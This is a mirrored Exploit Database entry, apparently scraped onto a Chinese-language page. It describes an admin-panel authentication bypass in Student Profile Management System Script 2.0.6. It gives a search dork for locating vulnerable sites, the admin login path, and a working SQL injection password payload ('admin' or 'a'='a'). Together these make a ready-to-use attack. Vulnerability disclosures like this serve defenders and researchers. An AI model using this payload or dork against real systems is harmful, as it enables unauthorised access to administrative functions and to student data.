Student Profile Management System Script 2.0.6 – Authentication Bypass

• Exploit Database
• 97 阅读

• 作者： L0RD
  日期： 2018-02-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43980/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

  # Exploit title: Student Profile Management System Script 2.0.6 - Admin Panel Authentication Bypass # Dork: "Powered by: i-Net Solution" # Date: 2018-02-06 # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com # Vendor Homepage: <blockquote class="wp-embedded-content" data-secret="wpCCs07rQV"><a href="https://phpscriptsmall.com/product/studentstaff-profile-management-system/" target="_blank"rel="external nofollow" class="external" >Student Profile Management System Script</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Student Profile Management System Script” — PHP Scripts Mall" src="https://phpscriptsmall.com/product/studentstaff-profile-management-system/embed/#?secret=wpCCs07rQV" data-secret="wpCCs07rQV" frameborder="0" marginmarginscrolling="no"></iframe> # Version: 2.0.6 # Category: Webapps # CVE: N/A # # # # # # Description: # With this exploit,Attacker can bypass admin panel Authentication. # # # # # # Proof of Concept:   # username : anything # password : admin&apos; or &apos;a&apos;=&apos;a # admin panel login : /admin_login.php